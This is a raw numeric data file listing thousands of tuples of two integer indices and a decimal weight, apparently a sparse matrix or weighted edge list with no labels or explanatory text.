(256, 114982, 0.23331),
(244, 114983, 0.91),
(256, 114996, 0.95669),
(258, 114996, 0.95669),
(256, 114998, 0.98),
(275, 114998, 0.98),
(256, 115473, 0.23331),
(178, 115473, 0.46662),
(178, 115474, 0.91),
(256, 115474, 0.91),
(178, 115475, 1.02669),
(256, 115475, 1.02669),
(256, 115504, 0.98),
(267, 115504, 0.98),
(256, 115505, 1.07331),
(267, 115505, 1.07331),
(241, 116581, 0.46669),
(242, 116581, 0.46669),
(265, 116581, 0.46669),
(266, 116581, 0.46669),
(241, 116597, 0.28),
(242, 116597, 0.56),
(242, 117070, 0.84),
(248, 117070, 0.84),
(240, 117070, 1.68),
(242, 117071, 1.07331),
(240, 117071, 2.14662),
(240, 117081, 1.05),
(242, 117081, 1.05),
(174, 117104, 0.86331),
(242, 117104, 0.86331),
(240, 117104, 1.72662),
(240, 117106, 0.98),
(242, 117106, 0.98),
(240, 117238, 0.86331),
(242, 117238, 0.86331),
(267, 117238, 0.86331),
(306, 117238, 0.86331),
(240, 118243, 0.95669),
(242, 118243, 0.95669),
(178, 118257, 0.46669),
(267, 118257, 0.46669),
(273, 118257, 0.46669),
(240, 118257, 0.93338),
(242, 118257, 0.93338),
(294, 118257, 4.26688),
(241, 146223, 0.88669),
(243, 146223, 0.88669),
(240, 146733, 0.88669),
(243, 146733, 0.88669),
(240, 146742, 0.88669),
(269, 146742, 0.88669),
(178, 146771, 0.28),
(240, 146771, 0.28),
(270, 146771, 0.28),
(301, 146771, 0.28),
(174, 146774, 0.37331),
(259, 146774, 0.37331),
(260, 146774, 0.37331),
(240, 146774, 0.74662),
(174, 146788, 0.88669),
(240, 146788, 0.88669),
(265, 146788, 0.88669),
(266, 146788, 0.88669),
(290, 146788, 0.88669),
(306, 146788, 0.88669),
(174, 146810, 0.95669),
(240, 146810, 0.95669),
(240, 146811, 0.86331),
(262, 146811, 0.86331),
(240, 146832, 0.86331),
(244, 146832, 0.86331),
(290, 146832, 0.86331),
(240, 146853, 0.91),
(244, 146853, 0.91),
(265, 146853, 0.91),
(266, 146853, 0.91),
(275, 146877, 0.84),
(240, 146877, 1.68),
(261, 146877, 1.68),
(240, 146881, 0.88669),
(258, 146881, 0.88669),
(240, 146883, 0.91),
(269, 146883, 0.91),
(292, 146883, 0.91),
(240, 146888, 0.14),
(267, 146888, 0.14),
(240, 146892, 1.00331),
(268, 146892, 1.00331),
(240, 146907, 0.98),
(243, 146907, 0.98),
(273, 146907, 0.98),
(306, 146907, 0.98),
(240, 146913, 0.84),
(261, 146913, 1.68),
(240, 146919, 0.86331),
(264, 146919, 0.86331),
(290, 146919, 1.72662),
(306, 146919, 1.72662),
(240, 147923, 0.23331),
(268, 147923, 0.23331),
(273, 147923, 0.23331),
(288, 147923, 0.23331),
(240, 147933, 0.95669),
(261, 147933, 0.95669),
(174, 147969, 0.42),
(240, 147969, 0.42),
(258, 147969, 0.42),
(272, 147969, 0.42),
(280, 147969, 0.42),
(304, 147969, 0.42),
(306, 147969, 0.42),
(240, 147972, 0.93331),
(244, 147972, 0.93331),
(240, 148018, 1.00331),
(262, 148018, 1.00331),
(272, 148020, 0.42),
(275, 148020, 0.42),
(280, 148020, 0.42),
(240, 148020, 0.84),
(240, 148021, 0.98),
(272, 148021, 0.98),
(280, 148021, 0.98),
(242, 148895, 0.93331),
(243, 148895, 0.93331),
(242, 148896, 1.00331),
(243, 148896, 1.00331),
(243, 156971, 0.84),
(306, 156971, 0.84),
(262, 156971, 3.36),
(243, 156980, 0.84),
(269, 156980, 0.84),
(243, 156983, 0.93331),
(267, 156983, 0.93331),
(243, 156996, 0.84),
(247, 156996, 0.84),
(243, 156998, 0.32669),
(259, 156998, 0.32669),
(243, 157018, 0.98),
(244, 157018, 0.98),
(248, 157018, 0.98),
(263, 157018, 0.98),
(288, 157018, 0.98),
(243, 157021, 0.88669),
(272, 157021, 0.88669),
(280, 157021, 0.88669),
(174, 157033, 0.88669),
(243, 157033, 0.88669),
(243, 157037, 0.93331),
(270, 157037, 1.86662),
(301, 157037, 1.86662),
(243, 157051, 1.02669),
(261, 157051, 1.02669),
(243, 157759, 1.00331),
(248, 157759, 1.00331),
(263, 157759, 1.00331),
(288, 157759, 1.00331),
(305, 157759, 1.00331),
(243, 157767, 0.37331),
(262, 157767, 0.37331),
(243, 157768, 1.00331),
(262, 157768, 1.00331),
(174, 158958, 0.88669),
(241, 158958, 0.88669),
(174, 158960, 0.84),
(274, 158960, 0.84),
(305, 158960, 0.84),
(241, 158960, 1.68),
(306, 158960, 1.68),
(241, 158967, 0.14),
(245, 158967, 0.14),
(268, 158967, 0.14),
(241, 158970, 0.18669),
(259, 158970, 0.18669),
(260, 158970, 0.18669),
(267, 158970, 0.18669),
(241, 158971, 0.86331),
(259, 158971, 0.86331),
(260, 158971, 0.86331),
(241, 158972, 0.98),
(259, 158972, 0.98),
(260, 158972, 0.98),
(258, 158973, 0.23331),
(241, 158973, 0.46662),
(305, 158973, 0.46662),
(241, 158996, 0.88669),
(263, 158996, 0.88669),
(241, 159001, 0.86331),
(178, 159001, 2.58993),
(174, 159006, 0.88669),
(241, 159006, 0.88669),
(241, 159522, 5.3332),
(261, 159522, 5.3332),
(241, 159530, 0.95669),
(258, 159530, 0.95669),
(261, 159530, 0.95669),
(241, 159531, 1.02669),
(258, 159531, 1.02669),
(178, 159539, 0.42),
(241, 159539, 0.42),
(290, 159539, 0.42),
(178, 159544, 0.91),
(241, 159544, 0.91),
(244, 159544, 0.91),
(248, 159546, 0.18669),
(241, 159546, 0.37338),
(262, 159546, 0.37338),
(241, 159557, 1.02669),
(265, 159557, 1.02669),
(266, 159557, 1.02669),
(241, 159580, 0.28),
(262, 159580, 0.28),
(258, 163066, 0.93331),
(263, 163066, 0.93331),
(304, 163066, 1.86662),
(247, 163072, 0.93331),
(259, 163072, 0.93331),
(260, 163072, 0.93331),
(174, 163072, 1.86662),
(306, 163072, 1.86662),
(258, 163072, 2.79993),
(168, 163078, 1.12),
(258, 163078, 1.12),
(261, 163078, 1.12),
(258, 163079, 0.51331),
(274, 163079, 0.51331),
(274, 163086, 0.91),
(258, 163086, 1.82),
(178, 163112, 0.91),
(258, 163112, 0.91),
(258, 163118, 0.37331),
(262, 163118, 0.37331),
(261, 163523, 0.28),
(258, 163523, 0.84),
(258, 163531, 0.14),
(305, 163531, 0.14),
(263, 163531, 0.28),
(244, 163534, 0.93331),
(258, 163534, 0.93331),
(258, 163545, 0.91),
(262, 163545, 0.91),
(258, 163552, 0.86331),
(273, 163552, 0.86331),
(244, 163556, 0.18669),
(306, 163556, 0.18669),
(258, 163556, 0.37338),
(292, 163556, 1.12014),
(178, 163563, 0.86331),
(258, 163563, 0.86331),
(292, 163563, 1.72662),
(174, 163587, 0.32669),
(258, 163587, 0.32669),
(292, 163587, 0.32669),
(242, 168232, 0.86331),
(270, 168232, 0.86331),
(301, 168232, 0.86331),
(242, 168233, 0.93331),
(270, 168233, 0.93331),
(301, 168233, 0.93331),
(272, 168234, 0.81669),
(280, 168234, 0.81669),
(242, 168234, 1.63338),
(272, 168235, 0.88669),
(280, 168235, 0.88669),
(242, 168235, 1.77338),
(174, 168268, 0.84),
(242, 168268, 0.84),
(242, 168275, 0.91),
(265, 168275, 1.82),
(266, 168275, 1.82),
(242, 168279, 0.37331),
(268, 168279, 0.37331),
(274, 168287, 0.37331),
(242, 168287, 1.11993),
(174, 168295, 0.98),
(242, 168295, 0.98),
(242, 168304, 0.88669),
(262, 168304, 0.88669),
(263, 168304, 0.88669),
(242, 168317, 0.95669),
(244, 168317, 0.95669),
(178, 168323, 0.91),
(242, 168323, 0.91),
(178, 168324, 0.98),
(242, 168324, 0.98),
(178, 168331, 0.91),
(242, 168331, 0.91),
(178, 168349, 0.91),
(242, 168349, 0.91),
(168, 168365, 0.28),
(242, 168365, 0.28),
(246, 168365, 0.28),
(242, 168370, 0.32669),
(249, 168370, 0.32669),
(242, 168371, 0.93331),
(249, 168371, 0.93331),
(242, 168400, 0.95669),
(263, 168400, 0.95669),
(242, 168408, 0.86331),
(274, 168408, 0.86331),
(306, 168408, 0.86331),
(178, 168412, 0.86331),
(242, 168412, 0.86331),
(242, 168424, 0.42),
(262, 168424, 0.42),
(263, 168424, 0.42),
(274, 168424, 0.42),
(306, 168424, 0.42),
(242, 169707, 1.05),
(269, 169707, 1.05),
(268, 169736, 0.23331),
(270, 169736, 0.23331),
(301, 169736, 0.23331),
(242, 169736, 0.46662),
(268, 169737, 0.88669),
(270, 169737, 0.88669),
(301, 169737, 0.88669),
(242, 169737, 1.77338),
(272, 169740, 0.84),
(280, 169740, 0.84),
(242, 169740, 1.68),
(242, 169748, 0.86331),
(306, 169748, 0.86331),
(178, 169748, 2.58993),
(242, 169763, 0.28),
(268, 169763, 0.28),
(292, 169763, 0.28),
(306, 169763, 0.28),
(261, 169763, 0.56),
(174, 169802, 0.88669),
(242, 169802, 0.88669),
(306, 169802, 0.88669),
(174, 169803, 1.00331),
(242, 169803, 1.00331),
(242, 169828, 0.93331),
(244, 169828, 0.93331),
(259, 173276, 0.88669),
(260, 173276, 0.88669),
(265, 173276, 0.88669),
(266, 173276, 0.88669),
(267, 173276, 0.88669),
(259, 173277, 0.98),
(260, 173277, 0.98),
(259, 173278, 0.95669),
(260, 173278, 0.95669),
(259, 173279, 1.14331),
(260, 173279, 1.14331),
(259, 173280, 0.86331),
(260, 173280, 0.86331),
(259, 173281, 1.05),
(260, 173281, 1.05),
(259, 173282, 1.02669),
(260, 173282, 1.02669),
(259, 173283, 0.98),
(260, 173283, 0.98),
(259, 173284, 1.19),
(260, 173284, 1.19),
(259, 173285, 1.07331),
(259, 173286, 1.26),
(259, 173287, 0.23331),
(260, 173287, 0.23331),
(259, 173288, 0.91),
(260, 173288, 0.91),
(259, 173289, 1.12),
(260, 173289, 1.12),
(259, 173290, 1.05),
(259, 173291, 1.26),
(259, 173292, 0.98),
(260, 173292, 0.98),
(259, 173293, 0.23331),
(260, 173293, 0.23331),
(259, 173294, 0.88669),
(260, 173294, 0.88669),
(259, 173295, 1.09669),
(260, 173295, 1.09669),
(259, 173296, 0.42),
(260, 173296, 0.42),
(259, 173297, 1.14331),
(260, 173297, 1.14331),
(259, 173298, 1.23669),
(260, 173298, 1.23669),
(259, 173299, 0.88669),
(260, 173299, 0.88669),
(259, 173300, 1.00331),
(260, 173300, 1.00331),
(259, 173301, 0.95669),
(260, 173301, 0.95669),
(259, 173302, 1.05),
(260, 173302, 1.05),
(259, 173303, 1.02669),
(260, 173303, 1.02669),
(259, 173304, 1.09669),
(260, 173304, 1.09669),
(259, 173305, 0.91),
(260, 173305, 0.91),
(259, 173306, 1.00331),
(260, 173306, 1.00331),
(259, 173307, 0.98),
(260, 173307, 0.98),
(259, 173308, 1.05),
(260, 173308, 1.05),
(259, 173309, 0.95669),
(260, 173309, 0.95669),
(267, 173309, 0.95669),
(272, 173309, 0.95669),
(275, 173309, 0.95669),
(280, 173309, 0.95669),
(288, 173309, 0.95669),
(259, 173310, 1.05),
(260, 173310, 1.05),
(259, 173311, 0.93331),
(260, 173311, 0.93331),
(259, 173312, 1.00331),
(260, 173312, 1.00331),
(259, 173313, 0.98),
(260, 173313, 0.98),
(259, 173314, 1.05),
(260, 173314, 1.05),
(259, 173315, 1.68),
(260, 173315, 1.68),
(259, 173316, 1.02669),
(260, 173316, 1.02669),
(259, 173317, 1.05),
(260, 173317, 1.05),
(259, 173318, 0.93331),
(260, 173318, 0.93331),
(259, 173319, 0.93331),
(260, 173319, 0.93331),
(259, 173320, 1.14331),
(260, 173320, 1.14331),
(268, 173321, 0.98),
(259, 173321, 2.94),
(260, 173321, 2.94),
(259, 173322, 3.42993),
(260, 173322, 3.42993),
(259, 173323, 1.00331),
(260, 173323, 1.00331),
(259, 173324, 1.12),
(260, 173324, 1.12),
(259, 173325, 1.05),
(260, 173325, 1.05),
(259, 173326, 1.16669),
(260, 173326, 1.16669),
(259, 173327, 0.98),
(260, 173327, 0.98),
(259, 173328, 1.07331),
(260, 173328, 1.07331),
(259, 173329, 0.98),
(260, 173329, 0.98),
(259, 173330, 1.07331),
(260, 173330, 1.07331),
(259, 173331, 1.09669),
(260, 173331, 1.09669),
(259, 173332, 1.00331),
(260, 173332, 1.00331),
(245, 173333, 0.91),
(259, 173333, 0.91),
(260, 173333, 0.91),
(259, 173334, 0.98),
(260, 173334, 0.98),
(259, 173335, 1.02669),
(260, 173335, 1.02669),
(259, 173336, 0.98),
(260, 173336, 0.98),
(305, 173336, 0.98),
(259, 173337, 1.05),
(260, 173337, 1.05),
(174, 173338, 0.93331),
(259, 173338, 0.93331),
(260, 173338, 0.93331),
(263, 173338, 0.93331),
(272, 173338, 0.93331),
(280, 173338, 0.93331),
(259, 173339, 1.02669),
(260, 173339, 1.02669),
(272, 173339, 1.02669),
(280, 173339, 1.02669),
(259, 173340, 1.96),
(260, 173340, 1.96),
(259, 173341, 0.98),
(260, 173341, 0.98),
(259, 173342, 1.09669),
(260, 173342, 1.09669),
(259, 173343, 1.14331),
(260, 173343, 1.14331),
(259, 173344, 0.91),
(260, 173344, 0.91),
(259, 173345, 1.02669),
(260, 173345, 1.02669),
(259, 173346, 1.00331),
(260, 173346, 1.00331),
(259, 173347, 1.09669),
(260, 173347, 1.09669),
(259, 173348, 0.95669),
(260, 173348, 0.95669),
(259, 173349, 1.19),
(260, 173349, 1.19),
(259, 173350, 0.98),
(260, 173350, 0.98),
(259, 173351, 1.07331),
(260, 173351, 1.07331),
(259, 173716, 5.3332),
(263, 173716, 5.3332),
(304, 173716, 5.3332),
(259, 173717, 0.37331),
(260, 173717, 0.37331),
(263, 173717, 0.37331),
(259, 173718, 0.98),
(260, 173718, 0.98),
(259, 173719, 1.16669),
(260, 173719, 1.16669),
(259, 173720, 0.37331),
(260, 173720, 0.37331),
(259, 173721, 0.98),
(260, 173721, 0.98),
(259, 173722, 1.12),
(260, 173722, 1.12),
(259, 173723, 0.28),
(260, 173723, 0.28),
(259, 173724, 0.98),
(260, 173724, 0.98),
(259, 173725, 1.19),
(260, 173725, 1.19),
(259, 173726, 0.95669),
(260, 173726, 0.95669),
(259, 173727, 1.07331),
(260, 173727, 1.07331),
(259, 173728, 0.91),
(260, 173728, 0.91),
(259, 173729, 1.02669),
(260, 173729, 1.02669),
(259, 173730, 0.14),
(260, 173730, 0.14),
(259, 173731, 0.88669),
(260, 173731, 0.88669),
(259, 173732, 0.98),
(260, 173732, 0.98),
(259, 173733, 0.23331),
(260, 173733, 0.23331),
(259, 173734, 1.00331),
(260, 173734, 1.00331),
(259, 173735, 1.09669),
(260, 173735, 1.09669),
(259, 173736, 0.93331),
(260, 173736, 0.93331),
(259, 173737, 1.09669),
(260, 173737, 1.09669),
(174, 173738, 0.23331),
(259, 173738, 0.23331),
(260, 173738, 0.23331),
(304, 173738, 0.23331),
(259, 173739, 1.02669),
(260, 173739, 1.02669),
(259, 173740, 1.09669),
(260, 173740, 1.09669),
(259, 173741, 0.95669),
(260, 173741, 0.95669),
(268, 173741, 0.95669),
(259, 173742, 1.05),
(260, 173742, 1.05),
(268, 173742, 1.05),
(259, 173743, 0.88669),
(260, 173743, 0.88669),
(306, 173743, 0.88669),
(259, 173744, 1.09669),
(260, 173744, 1.09669),
(259, 173745, 0.98),
(260, 173745, 0.98),
(259, 173746, 1.09669),
(260, 173746, 1.09669),
(259, 173747, 1.12),
(260, 173747, 1.12),
(259, 173748, 1.21331),
(260, 173748, 1.21331),
(248, 173749, 0.91),
(259, 173749, 0.91),
(260, 173749, 0.91),
(259, 173750, 1.07331),
(260, 173750, 1.07331),
(259, 173751, 0.42),
(260, 173751, 0.42),
(263, 173751, 0.42),
(288, 173751, 0.42),
(178, 173751, 0.84),
(259, 173752, 1.02669),
(260, 173752, 1.02669),
(259, 173753, 1.09669),
(260, 173753, 1.09669),
(259, 173754, 0.37331),
(260, 173754, 0.37331),
(272, 173754, 0.37331),
(280, 173754, 0.37331),
(259, 173755, 0.95669),
(260, 173755, 0.95669),
(259, 173756, 1.05),
(260, 173756, 1.05),
(259, 173757, 0.37331),
(260, 173757, 0.37331),
(259, 173758, 0.95669),
(260, 173758, 0.95669),
(259, 173759, 1.12),
(260, 173759, 1.12),
(168, 173760, 0.23331),
(259, 173760, 0.23331),
(260, 173760, 0.23331),
(259, 173761, 0.93331),
(260, 173761, 0.93331),
(259, 173762, 1.02669),
(260, 173762, 1.02669),
(248, 175449, 0.88669),
(261, 175449, 0.88669),
(174, 175484, 1.00331),
(261, 175484, 1.00331),
(261, 175490, 0.86331),
(270, 175490, 0.86331),
(301, 175490, 0.86331),
(174, 175964, 0.28),
(261, 175964, 0.28),
(174, 175992, 0.93331),
(247, 175992, 0.93331),
(261, 175992, 0.93331),
(261, 175999, 0.88669),
(263, 175999, 0.88669),
(288, 175999, 0.88669),
(261, 176010, 0.91),
(262, 176010, 0.91),
(267, 176010, 0.91),
(244, 176504, 0.91),
(306, 176504, 0.91),
(274, 176504, 2.73),
(168, 176507, 0.32669),
(244, 176507, 0.32669),
(265, 176507, 0.65338),
(266, 176507, 0.65338),
(178, 176528, 0.98),
(244, 176528, 0.98),
(178, 176529, 0.93331),
(244, 176529, 0.93331),
(244, 177030, 0.91),
(178, 177030, 2.73),
(244, 177045, 0.86331),
(249, 177045, 0.86331),
(244, 177053, 0.18669),
(269, 177053, 0.18669),
(275, 177053, 0.18669),
(292, 177053, 1.49352),
(244, 177078, 0.23331),
(273, 177078, 0.23331),
(245, 178843, 0.28),
(248, 178843, 0.28),
(246, 178866, 0.37331),
(248, 178866, 0.37331),
(245, 178866, 0.74662),
(174, 185256, 0.28),
(262, 185256, 0.28),
(274, 185256, 0.28),
(174, 185257, 1.00331),
(262, 185257, 1.00331),
(178, 185313, 0.88669),
(262, 185313, 1.77338),
(178, 185917, 0.95669),
(262, 185917, 0.95669),
(178, 185993, 0.56),
(262, 185993, 0.56),
(159, 189271, 0.98),
(159, 189272, 1.05),
(161, 189317, 0.86331),
(161, 189318, 0.93331),
(161, 189319, 0.86331),
(161, 189320, 0.95669),
(161, 189321, 0.88669),
(161, 189322, 0.98),
(161, 189323, 0.91),
(161, 189324, 0.98),
(161, 189325, 2.13312),
(161, 189326, 8.96),
(161, 189327, 10.88),
(161, 189328, 0.37331),
(263, 189328, 0.74662),
(161, 189329, 1.16669),
(161, 189330, 1.37669),
(161, 189331, 0.18669),
(161, 189332, 0.98),
(161, 189333, 1.16669),
(161, 189334, 0.91),
(272, 189334, 0.91),
(280, 189334, 0.91),
(161, 189335, 0.98),
(272, 189335, 0.98),
(280, 189335, 0.98),
(161, 189336, 0.88669),
(161, 189337, 1.07331),
(161, 189338, 0.91),
(161, 189339, 1.07331),
(161, 189340, 1.05),
(161, 189341, 1.19),
(161, 189342, 1.07331),
(161, 189343, 1.07331),
(161, 189344, 1.28331),
(161, 189345, 1.77338),
(161, 189346, 1.00331),
(161, 189347, 1.00331),
(161, 189348, 0.91),
(161, 189349, 1.05),
(161, 189350, 0.95669),
(161, 189718, 0.28),
(161, 189719, 1.02669),
(161, 189720, 1.21331),
(161, 189721, 0.14),
(161, 189722, 0.98),
(161, 189723, 1.07331),
(161, 189724, 0.32669),
(161, 189725, 1.12),
(161, 189726, 1.23669),
(161, 189727, 0.18669),
(161, 189728, 0.95669),
(161, 189729, 1.16669),
(161, 189730, 0.14),
(295, 189730, 0.14),
(161, 189731, 0.95669),
(161, 189732, 1.05),
(161, 189733, 0.28),
(161, 189734, 0.95669),
(161, 189735, 1.09669),
(161, 189736, 0.32669),
(161, 189737, 1.07331),
(161, 189738, 1.19),
(161, 189739, 0.23331),
(161, 189740, 1.07331),
(161, 189741, 1.19),
(161, 189742, 0.23331),
(161, 189743, 0.91),
(161, 189744, 1.05),
(161, 189745, 0.28),
(161, 189746, 0.93331),
(161, 189747, 1.21331),
(161, 189748, 0.88669),
(161, 189749, 0.98),
(161, 189750, 0.28),
(161, 189751, 0.95669),
(161, 189752, 1.21331),
(161, 189753, 0.95669),
(161, 189754, 1.09669),
(161, 189755, 0.95669),
(161, 189756, 1.02669),
(161, 189757, 0.56),
(161, 189758, 1.14331),
(161, 189759, 1.33),
(161, 189760, 0.37331),
(161, 189761, 0.98),
(161, 189762, 1.07331),
(161, 189763, 0.32669),
(161, 189764, 1.02669),
(161, 189765, 1.14331),
(178, 190412, 0.42),
(304, 190412, 0.42),
(193, 190412, 1.68),
(174, 190417, 0.37331),
(193, 190417, 0.37331),
(265, 190417, 0.37331),
(266, 190417, 0.37331),
(174, 190497, 1.00331),
(193, 190497, 1.00331),
(193, 191516, 0.23331),
(248, 191516, 0.46662),
(247, 191516, 2.36643),
(193, 191524, 0.46669),
(168, 191524, 1.13339),
(174, 191524, 3.80019),
(178, 191524, 3.80019),
(168, 191549, 0.23331),
(193, 191549, 0.23331),
(168, 191578, 0.88669),
(193, 191578, 0.88669),
(193, 191596, 0.42),
(248, 191596, 0.42),
(249, 191596, 0.42),
(290, 191596, 0.42),
(193, 191633, 0.28),
(248, 191633, 0.28),
(246, 192488, 0.86331),
(249, 192488, 0.86331),
(246, 192490, 0.91),
(248, 192490, 0.91),
(264, 192490, 0.91),
(246, 192492, 0.37331),
(272, 192492, 0.37331),
(280, 192492, 0.37331),
(290, 192492, 0.37331),
(246, 192524, 0.91),
(269, 192524, 0.91),
(246, 192947, 0.86331),
(248, 192947, 0.86331),
(168, 197612, 0.93331),
(168, 197613, 1.05),
(168, 197614, 1.02669),
(168, 197615, 1.19),
(168, 197616, 0.91),
(168, 197617, 1.07331),
(168, 197618, 0.91),
(168, 197619, 1.07331),
(168, 197620, 0.86331),
(168, 197621, 1.02669),
(168, 197622, 0.84),
(168, 197623, 0.98),
(168, 197624, 0.32669),
(168, 197625, 1.02669),
(168, 197626, 1.12),
(168, 197627, 0.93331),
(249, 197627, 0.93331),
(268, 197627, 1.86662),
(168, 197628, 1.12),
(168, 197629, 1.00331),
(168, 197630, 1.14331),
(168, 197631, 0.18669),
(168, 197632, 0.84),
(168, 197633, 0.93331),
(168, 197634, 0.91),
(168, 197635, 1.09669),
(168, 197636, 0.95669),
(267, 197636, 0.95669),
(168, 197637, 1.07331),
(168, 197638, 0.28),
(287, 197638, 3.08),
(168, 197639, 0.91),
(168, 197640, 1.00331),
(168, 197641, 0.93331),
(168, 197642, 1.16669),
(168, 197643, 0.98),
(168, 197644, 1.09669),
(168, 197645, 1.28331),
(168, 197646, 0.98),
(168, 197647, 1.19),
(168, 197648, 0.88669),
(168, 197649, 0.93331),
(168, 197650, 0.95669),
(168, 197651, 1.07331),
(168, 197652, 0.95669),
(168, 197653, 1.02669),
(168, 197654, 0.95669),
(168, 197655, 1.02669),
(168, 197656, 0.95669),
(168, 197657, 1.07331),
(168, 197658, 0.88669),
(168, 197659, 0.93331),
(168, 197660, 0.88669),
(168, 197661, 0.95669),
(168, 197662, 0.91),
(168, 197663, 1.00331),
(168, 197664, 0.32669),
(168, 197665, 0.95669),
(168, 197666, 1.00331),
(168, 197667, 0.95669),
(168, 197668, 1.02669),
(168, 197669, 0.93331),
(168, 197670, 0.98),
(168, 197671, 0.93331),
(168, 197672, 0.95669),
(168, 197673, 0.88669),
(168, 197674, 1.05),
(168, 197675, 0.93331),
(168, 197676, 1.68),
(168, 197677, 0.95669),
(168, 197678, 0.95669),
(168, 197679, 0.86331),
(168, 197680, 0.93331),
(168, 197681, 0.86331),
(168, 197682, 0.93331),
(168, 197683, 0.88669),
(168, 197684, 1.14331),
(168, 198200, 0.91),
(168, 198201, 1.07331),
(168, 198202, 0.32669),
(168, 198203, 0.95669),
(168, 198204, 1.09669),
(168, 198205, 2.72),
(174, 198205, 9.12),
(168, 198206, 2.94661),
(174, 198206, 9.87981),
(168, 198207, 1.05),
(168, 198208, 1.23669),
(168, 198209, 0.37331),
(168, 198210, 1.12),
(168, 198211, 1.4),
(168, 198212, 0.86331),
(168, 198213, 1.12),
(168, 198214, 0.88669),
(168, 198215, 1.19),
(168, 198216, 0.91),
(168, 198217, 1.00331),
(168, 198218, 0.86331),
(168, 198219, 1.00331),
(168, 198220, 0.23331),
(168, 198221, 0.93331),
(168, 198222, 1.00331),
(168, 198223, 0.86331),
(168, 198224, 0.95669),
(168, 198225, 1.02669),
(168, 198226, 1.02669),
(168, 198227, 1.09669),
(168, 198228, 1.19),
(168, 198229, 0.98),
(168, 198230, 0.93331),
(168, 198231, 1.02669),
(168, 198232, 0.88669),
(168, 198233, 1.05),
(168, 198234, 2.05338),
(168, 198235, 1.12),
(168, 198236, 1.23669),
(168, 198237, 1.02669),
(168, 198238, 1.21331),
(168, 198239, 1.07331),
(168, 198240, 1.21331),
(168, 198241, 0.98),
(168, 198242, 1.14331),
(168, 198243, 1.05),
(168, 198244, 1.16669),
(168, 198245, 0.95669),
(168, 198246, 1.05),
(168, 198247, 1.82),
(168, 198248, 1.02669),
(168, 198249, 0.98),
(168, 198250, 1.05),
(168, 198251, 0.98),
(168, 198252, 1.07331),
(168, 198253, 0.93331),
(168, 198254, 1.02669),
(168, 198255, 0.28),
(264, 198255, 0.28),
(304, 198255, 0.28),
(168, 198256, 1.05),
(168, 198257, 1.14331),
(168, 198258, 1.00331),
(168, 198259, 1.19),
(178, 211002, 0.56),
(263, 211002, 0.56),
(174, 214941, 0.81669),
(174, 214942, 0.93331),
(174, 214943, 1.09669),
(174, 214944, 0.91),
(174, 214945, 1.07331),
(174, 214946, 0.88669),
(174, 214947, 0.95669),
(174, 214948, 0.98),
(174, 214949, 0.95669),
(174, 214950, 0.86331),
(174, 214951, 0.95669),
(174, 214952, 0.98),
(174, 214953, 1.07331),
(174, 214954, 1.07331),
(174, 214955, 1.14331),
(174, 214956, 1.02669),
(174, 214957, 1.19),
(174, 214958, 1.02669),
(265, 214958, 1.02669),
(266, 214958, 1.02669),
(174, 214959, 1.19),
(174, 214960, 1.00331),
(174, 214961, 1.12),
(174, 214962, 1.07331),
(174, 214963, 1.30669),
(174, 214964, 0.23331),
(174, 214965, 0.93331),
(174, 214966, 1.00331),
(174, 214967, 0.88669),
(174, 214968, 0.95669),
(174, 214969, 0.84),
(174, 214970, 0.93331),
(174, 214971, 0.98),
(174, 214972, 0.91),
(174, 214973, 1.23669),
(174, 214974, 0.98),
(174, 214975, 1.00331),
(174, 214976, 1.26),
(174, 214977, 1.00331),
(174, 214978, 1.12),
(272, 214979, 0.91),
(280, 214979, 0.91),
(174, 214979, 1.82),
(174, 214980, 0.95669),
(174, 214981, 1.05),
(174, 214982, 1.07331),
(174, 214983, 1.09669),
(174, 214984, 1.19),
(174, 214985, 1.09669),
(174, 214986, 2.1),
(174, 214987, 2.05338),
(174, 214988, 1.09669),
(174, 214989, 1.14331),
(174, 214990, 3.15),
(174, 214991, 1.23669),
(174, 214992, 1.12),
(174, 214993, 1.14331),
(174, 214994, 0.93331),
(174, 214995, 1.09669),
(174, 214996, 1.16669),
(174, 214997, 0.95669),
(174, 214998, 1.09669),
(174, 214999, 0.88669),
(174, 215000, 1.00331),
(174, 215001, 0.95669),
(174, 215002, 1.07331),
(174, 215003, 0.98),
(174, 215004, 1.07331),
(288, 215005, 1.05),
(174, 215005, 2.1),
(174, 215006, 1.23669),
(174, 215007, 1.12),
(174, 215008, 0.98),
(174, 215009, 1.07331),
(174, 215010, 1.14331),
(174, 215011, 0.91),
(174, 215012, 1.05),
(174, 215013, 0.95669),
(174, 215014, 1.02669),
(174, 215015, 0.95669),
(174, 215016, 1.02669),
(174, 215017, 0.98),
(174, 215018, 0.98),
(174, 215019, 1.09669),
(174, 215020, 0.95669),
(174, 215021, 0.95669),
(174, 215022, 1.07331),
(174, 215023, 0.84),
(174, 215024, 1.00331),
(174, 215025, 1.00331),
(174, 215026, 0.95669),
(174, 215027, 0.91),
(174, 215028, 1.02669),
(174, 215029, 1.05),
(174, 215030, 0.91),
(174, 215031, 1.02669),
(174, 215032, 1.12),
(174, 215033, 0.98),
(174, 215034, 1.21331),
(174, 215035, 0.95669),
(174, 215036, 1.16669),
(174, 215037, 0.81669),
(174, 215038, 0.98),
(174, 215039, 0.86331),
(269, 215039, 0.86331),
(174, 215040, 0.95669),
(174, 215041, 1.02669),
(174, 215042, 1.14331),
(174, 215043, 1.05),
(174, 215044, 0.86331),
(263, 215044, 0.86331),
(174, 215045, 0.93331),
(174, 215046, 1.00331),
(174, 215047, 1.00331),
(174, 215048, 1.09669),
(174, 215049, 1.00331),
(174, 215050, 0.91),
(174, 215051, 1.00331),
(174, 215052, 0.46662),
(174, 215053, 1.86662),
(174, 215054, 2.00662),
(174, 215055, 0.88669),
(174, 215056, 1.07331),
(174, 215057, 0.95669),
(174, 215058, 0.86331),
(306, 215058, 0.86331),
(174, 215059, 1.02669),
(174, 215060, 1.12),
(174, 215061, 0.18669),
(174, 215062, 0.86331),
(174, 215063, 0.95669),
(174, 215064, 3.6),
(237, 215064, 3.6),
(250, 215064, 3.6),
(251, 215064, 3.6),
(252, 215064, 3.6),
(253, 215064, 3.6),
(254, 215064, 3.6),
(256, 215064, 3.6),
(265, 215064, 3.6),
(266, 215064, 3.6),
(267, 215064, 3.6),
(268, 215064, 3.6),
(269, 215064, 3.6),
(270, 215064, 3.6),
(272, 215064, 3.6),
(273, 215064, 3.6),
(274, 215064, 3.6),
(275, 215064, 3.6),
(280, 215064, 3.6),
(288, 215064, 3.6),
(290, 215064, 3.6),
(292, 215064, 3.6),
(299, 215064, 3.6),
(301, 215064, 3.6),
(174, 215744, 1.00331),
(174, 215745, 1.07331),
(174, 215746, 1.77338),
(247, 215746, 1.77338),
(174, 215747, 1.91338),
(174, 215748, 0.91),
(174, 215749, 1.05),
(174, 215750, 0.32669),
(174, 215751, 0.95669),
(174, 215752, 1.07331),
